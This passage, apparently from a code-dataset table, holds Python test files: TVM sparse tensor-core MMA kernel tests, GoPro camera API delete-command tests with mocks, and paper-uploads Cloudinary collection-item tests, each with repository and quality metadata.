hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
321cd28ff6f7db7c87b83217a34bf3fa864678f4 | 11,095 | py | Python | tests/python/unittest/test_tir_ptx_mma_sp.py | XiaoSong9905/tvm | 48940f697e15d5b50fa1f032003e6c700ae1e423 | [
"Apache-2.0"
] | 4,640 | 2017-08-17T19:22:15.000Z | 2019-11-04T15:29:46.000Z | tests/python/unittest/test_tir_ptx_mma_sp.py | XiaoSong9905/tvm | 48940f697e15d5b50fa1f032003e6c700ae1e423 | [
"Apache-2.0"
] | 2,863 | 2017-08-17T19:55:50.000Z | 2019-11-04T17:18:41.000Z | tests/python/unittest/test_tir_ptx_mma_sp.py | XiaoSong9905/tvm | 48940f697e15d5b50fa1f032003e6c700ae1e423 | [
"Apache-2.0"
] | 1,352 | 2017-08-17T19:30:38.000Z | 2019-11-04T16:09:29.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
from tvm.script import tir as T
import numpy as np
import tvm.testing
def gen_2in4_mask(m: int, n: int):
assert n % 4 == 0
return np.array(
[[np.sort(np.random.choice(4, 2, replace=False)) for _ in range(n // 4)] for _ in range(m)]
).astype("uint8")
def get_dense_mat_by_mask(val, mask):
m, n_chunks, _ = mask.shape
val = val.reshape(m, n_chunks, 2)
ret = np.zeros((m, n_chunks, 4)).astype(val.dtype)
for i in range(m):
for j in range(n_chunks):
for k in range(2):
ret[i, j, mask[i, j, k]] = val[i, j, k]
return ret.reshape(m, n_chunks * 4)
@T.prim_func
def mma_sp_m16n8k16_f16f16f16(a: T.handle, b: T.handle, c: T.handle, _metadata: T.handle):
T.func_attr({"global_symbol": "default_function", "tir.noalias": True})
A = T.match_buffer(a, [16, 8], dtype="float16")
B = T.match_buffer(b, [16, 8], dtype="float16")
C = T.match_buffer(c, [16, 8], dtype="float16")
metadata = T.match_buffer(_metadata, [8], dtype="uint32")
brow = T.env_thread("blockIdx.y")
bcol = T.env_thread("blockIdx.x")
tx = T.env_thread("threadIdx.x")
T.launch_thread(brow, 1)
T.launch_thread(bcol, 1)
T.launch_thread(tx, 32)
multi_a = T.allocate([4], "float16", scope="local")
multi_b = T.allocate([4], "float16", scope="local")
accum = T.allocate([4], "float16", scope="local")
meta_local = T.allocate([1], "uint32", scope="local")
for i in range(4):
accum[i] = T.float16(0)
for i in range(4):
multi_a[i] = A[tx // 4 + i // 2 * 8, tx % 4 * 2 + i % 2]
for i in range(4):
multi_b[i] = B[tx % 4 * 2 + i % 2 + i // 2 * 8, tx // 4]
meta_local[0] = metadata[tx // 4]
T.evaluate(
T.ptx_mma_sp(
"m16n8k16",
"row",
"col",
"fp16",
"fp16",
"fp16",
multi_a.data,
0,
multi_b.data,
0,
accum.data,
0,
meta_local.data,
0,
0,
False,
dtype="float16",
)
)
for i in range(4):
C[i // 2 * 8 + tx // 4, tx % 4 * 2 + i % 2] = accum[i]
@T.prim_func
def mma_sp_m16n8k16_f16f16f32(a: T.handle, b: T.handle, c: T.handle, _metadata: T.handle):
T.func_attr({"global_symbol": "default_function", "tir.noalias": True})
A = T.match_buffer(a, [16, 8], dtype="float16")
B = T.match_buffer(b, [16, 8], dtype="float16")
C = T.match_buffer(c, [16, 8], dtype="float32")
metadata = T.match_buffer(_metadata, [8], dtype="uint32")
brow = T.env_thread("blockIdx.y")
bcol = T.env_thread("blockIdx.x")
tx = T.env_thread("threadIdx.x")
T.launch_thread(brow, 1)
T.launch_thread(bcol, 1)
T.launch_thread(tx, 32)
multi_a = T.allocate([4], "float16", scope="local")
multi_b = T.allocate([4], "float16", scope="local")
accum = T.allocate([4], "float32", scope="local")
meta_local = T.allocate([1], "uint32", scope="local")
for i in range(4):
accum[i] = T.float16(0)
for i in range(4):
multi_a[i] = A[tx // 4 + i // 2 * 8, tx % 4 * 2 + i % 2]
for i in range(4):
multi_b[i] = B[tx % 4 * 2 + i % 2 + i // 2 * 8, tx // 4]
meta_local[0] = metadata[tx // 4]
T.evaluate(
T.ptx_mma_sp(
"m16n8k16",
"row",
"col",
"fp16",
"fp16",
"fp32",
multi_a.data,
0,
multi_b.data,
0,
accum.data,
0,
meta_local.data,
0,
0,
False,
dtype="float32",
)
)
for i in range(4):
C[i // 2 * 8 + tx // 4, tx % 4 * 2 + i % 2] = accum[i]
@T.prim_func
def mma_sp_m16n8k32_f16f16f16(a: T.handle, b: T.handle, c: T.handle, _metadata: T.handle):
T.func_attr({"global_symbol": "default_function", "tir.noalias": True})
A = T.match_buffer(a, [16, 16], dtype="float16")
B = T.match_buffer(b, [32, 8], dtype="float16")
C = T.match_buffer(c, [16, 8], dtype="float16")
metadata = T.match_buffer(_metadata, [16], dtype="uint32")
brow = T.env_thread("blockIdx.y")
bcol = T.env_thread("blockIdx.x")
tx = T.env_thread("threadIdx.x")
T.launch_thread(brow, 1)
T.launch_thread(bcol, 1)
T.launch_thread(tx, 32)
multi_a = T.allocate([8], "float16", scope="local")
multi_b = T.allocate([8], "float16", scope="local")
accum = T.allocate([4], "float16", scope="local")
meta_local = T.allocate([1], "uint32", scope="local")
for i in range(4):
accum[i] = T.float16(0)
for i in range(8):
multi_a[i] = A[(i % 4) // 2 * 8 + tx // 4, i // 4 * 8 + tx % 4 * 2 + i % 2]
for i in range(8):
multi_b[i] = B[i // 2 * 8 + tx % 4 * 2 + i % 2, tx // 4]
meta_local[0] = metadata[tx // 4 * 2 + tx % 2]
T.evaluate(
T.ptx_mma_sp(
"m16n8k32",
"row",
"col",
"fp16",
"fp16",
"fp16",
multi_a.data,
0,
multi_b.data,
0,
accum.data,
0,
meta_local.data,
0,
0,
False,
dtype="float16",
)
)
for i in range(4):
C[i // 2 * 8 + tx // 4, tx % 4 * 2 + i % 2] = accum[i]
@T.prim_func
def mma_sp_m16n8k32_f16f16f32(a: T.handle, b: T.handle, c: T.handle, _metadata: T.handle):
T.func_attr({"global_symbol": "default_function", "tir.noalias": True})
A = T.match_buffer(a, [16, 16], dtype="float16")
B = T.match_buffer(b, [32, 8], dtype="float16")
C = T.match_buffer(c, [16, 8], dtype="float32")
metadata = T.match_buffer(_metadata, [16], dtype="uint32")
brow = T.env_thread("blockIdx.y")
bcol = T.env_thread("blockIdx.x")
tx = T.env_thread("threadIdx.x")
T.launch_thread(brow, 1)
T.launch_thread(bcol, 1)
T.launch_thread(tx, 32)
multi_a = T.allocate([8], "float16", scope="local")
multi_b = T.allocate([8], "float16", scope="local")
accum = T.allocate([4], "float32", scope="local")
meta_local = T.allocate([1], "uint32", scope="local")
for i in range(4):
accum[i] = T.float16(0)
for i in range(8):
multi_a[i] = A[(i % 4) // 2 * 8 + tx // 4, i // 4 * 8 + tx % 4 * 2 + i % 2]
for i in range(8):
multi_b[i] = B[i // 2 * 8 + tx % 4 * 2 + i % 2, tx // 4]
meta_local[0] = metadata[tx // 4 * 2 + tx % 2]
T.evaluate(
T.ptx_mma_sp(
"m16n8k32",
"row",
"col",
"fp16",
"fp16",
"fp32",
multi_a.data,
0,
multi_b.data,
0,
accum.data,
0,
meta_local.data,
0,
0,
False,
dtype="float32",
)
)
for i in range(4):
C[i // 2 * 8 + tx // 4, tx % 4 * 2 + i % 2] = accum[i]
@tvm.testing.requires_cuda
def test_mma_sp_m16n8k16_f16():
def get_meta_m16n8k16_half(mask):
assert mask.shape == (16, 4, 2)
mask = mask.reshape(16, 8)
ret = np.zeros((8,)).astype("uint32")
for i in range(8):
base = 1
for blk in range(2):
for j in range(8):
ret[i] |= int(mask[blk * 8 + i, j]) * base
base = base << 2
return ret
for out_dtype in ["float16", "float32"]:
func = mma_sp_m16n8k16_f16f16f16 if out_dtype == "float16" else mma_sp_m16n8k16_f16f16f32
sch = tvm.tir.Schedule(func)
arch = tvm.contrib.nvcc.get_target_compute_version()
major, _ = tvm.contrib.nvcc.parse_compute_version(arch)
if major < 8:
# Requires SM80+
return
cuda_mod = tvm.build(sch.mod, target="cuda")
A_np = np.random.uniform(-1, 1, [16, 8]).astype("float16")
B_np = np.random.uniform(-1, 1, [16, 8]).astype("float16")
mask = gen_2in4_mask(16, 16)
A_dense_np = get_dense_mat_by_mask(A_np, mask)
C_np = np.matmul(A_dense_np, B_np).astype(out_dtype)
meta = get_meta_m16n8k16_half(mask)
ctx = tvm.cuda()
A_tvm = tvm.nd.array(A_np, ctx)
B_tvm = tvm.nd.array(B_np, ctx)
C_tvm = tvm.nd.array(np.zeros_like(C_np), ctx)
meta_tvm = tvm.nd.array(meta, ctx)
cuda_mod(A_tvm, B_tvm, C_tvm, meta_tvm)
tvm.testing.assert_allclose(C_tvm.numpy(), C_np, atol=1e-3, rtol=1e-3)
@tvm.testing.requires_cuda
def test_mma_sp_m16n8k32_f16():
def get_meta_m16n8k32_half(mask):
assert mask.shape == (16, 8, 2)
mask = mask.reshape(16, 2, 8)
ret = np.zeros((8, 2)).astype("uint32")
for i in range(8):
for k in range(2):
base = 1
for blk in range(2):
for j in range(8):
ret[i, k] |= int(mask[blk * 8 + i, k, j]) * base
base = base << 2
return ret.reshape(16)
for out_dtype in ["float16", "float32"]:
func = mma_sp_m16n8k32_f16f16f16 if out_dtype == "float16" else mma_sp_m16n8k32_f16f16f32
sch = tvm.tir.Schedule(func)
arch = tvm.contrib.nvcc.get_target_compute_version()
major, _ = tvm.contrib.nvcc.parse_compute_version(arch)
if major < 8:
# Requires SM80+
return
cuda_mod = tvm.build(sch.mod, target="cuda")
A_np = np.random.uniform(-1, 1, [16, 16]).astype("float16")
B_np = np.random.uniform(-1, 1, [32, 8]).astype("float16")
mask = gen_2in4_mask(16, 32)
A_dense_np = get_dense_mat_by_mask(A_np, mask)
C_np = np.matmul(A_dense_np, B_np).astype(out_dtype)
meta = get_meta_m16n8k32_half(mask)
ctx = tvm.cuda()
A_tvm = tvm.nd.array(A_np, ctx)
B_tvm = tvm.nd.array(B_np, ctx)
C_tvm = tvm.nd.array(np.zeros_like(C_np), ctx)
meta_tvm = tvm.nd.array(meta, ctx)
cuda_mod(A_tvm, B_tvm, C_tvm, meta_tvm)
tvm.testing.assert_allclose(C_tvm.numpy(), C_np, atol=1e-3, rtol=1e-3)
if __name__ == "__main__":
test_mma_sp_m16n8k16_f16()
test_mma_sp_m16n8k32_f16()
| 31.974063 | 99 | 0.542947 | 1,677 | 11,095 | 3.433512 | 0.118068 | 0.03404 | 0.019799 | 0.036297 | 0.824592 | 0.784126 | 0.775443 | 0.753387 | 0.721084 | 0.702675 | 0 | 0.075946 | 0.304552 | 11,095 | 346 | 100 | 32.066474 | 0.670295 | 0.070482 | 0 | 0.798561 | 0 | 0 | 0.079172 | 0 | 0 | 0 | 0 | 0 | 0.017986 | 1 | 0.035971 | false | 0 | 0.014388 | 0 | 0.071942 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
321f67a046365edb4ed8256045a9be4215bc041d | 2,078 | py | Python | tests/test_delete.py | waider/gopro-py-api | b18b5458f5bbe689f468842d6888104317786de8 | [
"MIT"
] | 1 | 2019-05-06T21:48:54.000Z | 2019-05-06T21:48:54.000Z | tests/test_delete.py | waider/gopro-py-api | b18b5458f5bbe689f468842d6888104317786de8 | [
"MIT"
] | null | null | null | tests/test_delete.py | waider/gopro-py-api | b18b5458f5bbe689f468842d6888104317786de8 | [
"MIT"
] | null | null | null | from .conftest import GoProCameraTest, GoProCameraAuthTest
from goprocam import GoProCamera
class DeleteTest(GoProCameraTest):
def test_delete_last(self):
with self.monkeypatch.context() as m:
def verify_cmd(self, text):
assert text == 'storage/delete/last'
m.setattr(GoProCamera.GoPro, 'gpControlCommand', verify_cmd)
self.goprocam.delete('last')
def test_delete_all(self):
with self.monkeypatch.context() as m:
def verify_cmd(self, text):
assert text == 'storage/delete/all'
m.setattr(GoProCamera.GoPro, 'gpControlCommand', verify_cmd)
self.goprocam.delete('all')
def test_delete_some(self):
with self.monkeypatch.context() as m:
def verify_cmd(self, text):
self.counter = self.counter + 1
assert text == 'storage/delete/last'
m.setattr(GoProCamera.GoPro, 'gpControlCommand', verify_cmd)
self.goprocam.counter = 0
self.goprocam.delete(2)
assert self.goprocam.counter == 2
class DeleteAuthTest(GoProCameraAuthTest):
def test_delete_last(self):
with self.monkeypatch.context() as m:
def verify_cmd(self, text):
assert text == 'DL'
m.setattr(GoProCamera.GoPro, 'sendCamera', verify_cmd)
self.goprocam.delete('last')
def test_delete_all(self):
with self.monkeypatch.context() as m:
def verify_cmd(self, text):
assert text == 'DA'
m.setattr(GoProCamera.GoPro, 'sendCamera', verify_cmd)
self.goprocam.delete('all')
def test_delete_some(self):
with self.monkeypatch.context() as m:
def verify_cmd(self, text):
self.counter = self.counter + 1
assert text == 'DL'
m.setattr(GoProCamera.GoPro, 'sendCamera', verify_cmd)
self.goprocam.counter = 0
self.goprocam.delete(2)
assert self.goprocam.counter == 2
| 31.969231 | 72 | 0.599134 | 229 | 2,078 | 5.331878 | 0.161572 | 0.088452 | 0.127764 | 0.113022 | 0.873874 | 0.873874 | 0.873874 | 0.873874 | 0.873874 | 0.873874 | 0 | 0.005491 | 0.298845 | 2,078 | 64 | 73 | 32.46875 | 0.832533 | 0 | 0 | 0.869565 | 0 | 0 | 0.07411 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 1 | 0.26087 | false | 0 | 0.043478 | 0 | 0.347826 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5c7e70a70e8ae9cb10d57e198ccf149c29501395 | 40 | py | Python | code/data/__init__.py | takaratruong/emergent-generalization | 20de15ee6514dba48b48c76d8cd9289d62966932 | [
"MIT"
] | 10 | 2021-06-06T01:07:54.000Z | 2022-02-27T22:34:06.000Z | code/data/__init__.py | takaratruong/emergent-generalization | 20de15ee6514dba48b48c76d8cd9289d62966932 | [
"MIT"
] | null | null | null | code/data/__init__.py | takaratruong/emergent-generalization | 20de15ee6514dba48b48c76d8cd9289d62966932 | [
"MIT"
] | 1 | 2021-07-16T18:11:23.000Z | 2021-07-16T18:11:23.000Z | from . import loader
from . import util
| 13.333333 | 20 | 0.75 | 6 | 40 | 5 | 0.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 40 | 2 | 21 | 20 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
5c86b329b028f22a188e2966a54fb4cb356aac4d | 27,452 | py | Python | tests/tests/cloudinary_/models/test_collection.py | dldevinc/paper-uploads | 9414b6e6fbaa52eadacd9852ce3c4d84c6c2c939 | [
"BSD-3-Clause"
] | 3 | 2020-06-05T10:43:05.000Z | 2022-02-22T16:46:16.000Z | tests/tests/cloudinary_/models/test_collection.py | dldevinc/paper-uploads | 9414b6e6fbaa52eadacd9852ce3c4d84c6c2c939 | [
"BSD-3-Clause"
] | 2 | 2021-04-03T12:25:20.000Z | 2022-02-02T06:10:46.000Z | tests/tests/cloudinary_/models/test_collection.py | dldevinc/paper-uploads | 9414b6e6fbaa52eadacd9852ce3c4d84c6c2c939 | [
"BSD-3-Clause"
] | null | null | null | import posixpath
from contextlib import contextmanager
import cloudinary.exceptions
import pytest
from cloudinary import uploader
from django.core.files import File
from django.template.loader import render_to_string
from django.utils.crypto import get_random_string
from app.models.site import (
CloudinaryCompleteCollection,
CloudinaryFileCollection,
CloudinaryMediaCollection,
)
from paper_uploads.cloudinary.models import (
CloudinaryFileItem,
CloudinaryImageItem,
CloudinaryMediaItem,
)
from paper_uploads.exceptions import UnsupportedFileError
from ... import utils
from ...dummy import *
from ...models.test_dummy import (
TestFileFieldResourceAttach,
TestFileFieldResourceDelete,
TestFileFieldResourceEmpty,
TestFileFieldResourceRename,
TestImageFieldResourceAttach,
TestImageFieldResourceDelete,
TestImageFieldResourceEmpty,
TestImageFieldResourceRename,
)
from ...models.test_collection import CollectionItemMixin
from .test_base import CloudinaryFileResource
class TestFileItem(CollectionItemMixin, CloudinaryFileResource):
resource_url = '/media/collections/files/%Y-%m-%d'
resource_location = 'collections/files/%Y-%m-%d'
resource_name = 'document'
resource_extension = 'pdf'
resource_size = 3028
resource_checksum = '93e67b2ff2140c3a3f995ff9e536c4cb58b5df482dd34d47a39cf3337393ef7e'
file_field_name = 'file'
collection_class = CloudinaryCompleteCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.resource = CloudinaryFileItem()
storage.resource.attach_to(storage.collection)
with open(DOCUMENT_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp)
storage.resource.save()
yield
storage.resource.delete_file()
storage.resource.delete()
storage.collection.delete()
def test_get_file_folder(self, storage):
assert storage.resource.get_file_folder() == self.resource_location
def test_display_name(self, storage):
assert storage.resource.display_name == self.resource_name
def test_item_type(self, storage):
assert storage.resource.item_type == 'file'
def test_type(self, storage):
file_field = storage.resource.get_file_field()
assert file_field.type == 'private'
assert file_field.resource_type == 'raw'
def test_public_id(self, storage):
public_id = storage.resource.get_file().public_id
pattern = posixpath.join(self.resource_location, 'document{suffix}.pdf')
assert public_id == utils.get_target_filepath(pattern, public_id)
def test_name(self, storage):
file_name = storage.resource.name
pattern = posixpath.join(self.resource_location, 'document{suffix}.pdf')
assert file_name == utils.get_target_filepath(pattern, file_name)
def test_read(self, storage):
with storage.resource.open() as fp:
assert fp.read(4) == b'%PDF'
def test_as_dict(self, storage):
assert storage.resource.as_dict() == {
'id': 1,
'collectionId': 1,
'itemType': 'file',
'name': self.resource_name,
'extension': self.resource_extension,
'size': self.resource_size,
'caption': '{}.{}'.format(self.resource_name, self.resource_extension),
'order': 0,
'preview': render_to_string(
'paper_uploads/items/preview/file.html',
storage.resource.get_preview_context()
),
'url': storage.resource.get_file_url(),
'created': storage.resource.created_at.isoformat(),
'modified': storage.resource.modified_at.isoformat(),
'uploaded': storage.resource.uploaded_at.isoformat(),
}
def test_file_supported(self, storage):
with open(DOCUMENT_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
with open(NATURE_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
with open(MEDITATION_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
with open(AUDIO_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
@pytest.mark.django_db
class TestFileItemAttach(TestFileFieldResourceAttach):
resource_class = CloudinaryFileItem
collection_class = CloudinaryFileCollection
@contextmanager
def get_resource(self):
collection = self.collection_class.objects.create()
resource = self.resource_class()
resource.attach_to(collection)
try:
yield resource
finally:
resource.delete_file()
collection.delete()
class TestFileItemRename(TestFileFieldResourceRename):
resource_class = CloudinaryFileItem
resource_location = 'collections/files/%Y-%m-%d'
collection_class = CloudinaryFileCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.uid = get_random_string(5)
storage.resource = cls.resource_class()
storage.resource.attach_to(storage.collection)
with open(NATURE_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_cfile_name_{}.jpg'.format(storage.uid))
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.resource.rename_file('new_cfile_name_{}.png'.format(storage.uid))
yield
storage.resource.delete_file()
storage.resource.delete()
def test_old_file_exists(self, storage):
file = storage.resource.get_file()
with pytest.raises(cloudinary.exceptions.Error):
uploader.explicit(
storage.old_source_name,
type=file.resource.type,
resource_type=file.resource.resource_type
)
def test_new_file_exists(self, storage):
file = storage.resource.get_file()
uploader.explicit(
file.name,
type=file.resource.type,
resource_type=file.resource.resource_type
)
def test_old_file_name(self, storage):
assert storage.old_source_name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'old_cfile_name_{}{{suffix}}.jpg'.format(storage.uid)),
storage.old_source_name
)
def test_new_file_name(self, storage):
file = storage.resource.get_file()
assert file.name == utils.get_target_filepath(
posixpath.join(self.resource_location, 'new_cfile_name_{}{{suffix}}.png'.format(storage.uid)),
file.name
)
def test_basename(self, storage):
assert storage.resource.basename == utils.get_target_filepath(
'new_cfile_name_{}{{suffix}}'.format(storage.uid),
storage.resource.basename
)
class TestFileItemDelete(TestFileFieldResourceDelete):
resource_class = CloudinaryFileItem
resource_location = 'collections/files/%Y-%m-%d'
collection_class = CloudinaryFileCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.resource = cls.resource_class()
storage.resource.attach_to(storage.collection)
with open(NATURE_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp, name='old_name.jpg')
storage.resource.save()
file = storage.resource.get_file()
storage.old_source_name = file.name
storage.resource.delete_file()
yield
storage.resource.delete()
def test_file_not_exists(self, storage):
file_field = storage.resource.get_file_field()
with pytest.raises(cloudinary.exceptions.Error):
uploader.explicit(
storage.old_source_name,
type=file_field.type,
resource_type=file_field.resource_type
)
class TestFileItemEmpty(TestFileFieldResourceEmpty):
recource_class = CloudinaryFileItem
collection_class = CloudinaryFileCollection
@classmethod
def init_class(cls, storage):
collection = cls.collection_class.objects.create()
storage.resource = cls.recource_class()
storage.resource.attach_to(collection)
yield
collection.delete()
def test_path(self, storage):
pass
class TestMediaItem(CollectionItemMixin, CloudinaryFileResource):
resource_url = '/media/collections/files/%Y-%m-%d'
resource_location = 'collections/files/%Y-%m-%d'
resource_name = 'audio'
resource_extension = 'mp3'
resource_size = 2113939
resource_checksum = '4792f5f997f82f225299e98a1e396c7d7e479d10ffe6976f0b487361d729a15d'
owner_app_label = ''
owner_model_name = ''
owner_fieldname = ''
owner_class = None
file_field_name = 'file'
collection_class = CloudinaryCompleteCollection
@classmethod
def init_class(cls, storage):
storage.collection = cls.collection_class.objects.create()
storage.resource = CloudinaryMediaItem()
storage.resource.attach_to(storage.collection)
with open(AUDIO_FILEPATH, 'rb') as fp:
storage.resource.attach_file(fp)
storage.resource.save()
yield
storage.resource.delete_file()
storage.resource.delete()
storage.collection.delete()
def test_get_file_folder(self, storage):
assert storage.resource.get_file_folder() == self.resource_location
def test_display_name(self, storage):
assert storage.resource.display_name == self.resource_name
def test_item_type(self, storage):
assert storage.resource.item_type == 'media'
def test_type(self, storage):
file_field = storage.resource.get_file_field()
assert file_field.type == 'private'
assert file_field.resource_type == 'video'
def test_public_id(self, storage):
public_id = storage.resource.get_file().public_id
pattern = posixpath.join(self.resource_location, 'audio{suffix}')
assert public_id == utils.get_target_filepath(pattern, public_id)
def test_name(self, storage):
file_name = storage.resource.name
pattern = posixpath.join(self.resource_location, 'audio{suffix}')
assert file_name == utils.get_target_filepath(pattern, file_name)
def test_read(self, storage):
with storage.resource.open() as fp:
assert fp.read(4) == b'ID3\x03'
def test_as_dict(self, storage):
assert storage.resource.as_dict() == {
'id': 1,
'collectionId': 1,
'itemType': 'media',
'name': self.resource_name,
'extension': self.resource_extension,
'size': self.resource_size,
'caption': '{}.{}'.format(self.resource_name, self.resource_extension),
'order': 0,
'preview': render_to_string(
'paper_uploads/items/preview/file.html',
storage.resource.get_preview_context()
),
'url': storage.resource.get_file_url(),
'created': storage.resource.created_at.isoformat(),
'modified': storage.resource.modified_at.isoformat(),
'uploaded': storage.resource.uploaded_at.isoformat(),
}
def test_file_supported(self, storage):
with open(DOCUMENT_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is False
with open(NATURE_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is False
with open(MEDITATION_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is False
with open(AUDIO_FILEPATH, 'rb') as fp:
assert storage.resource.file_supported(File(fp)) is True
@pytest.mark.django_db
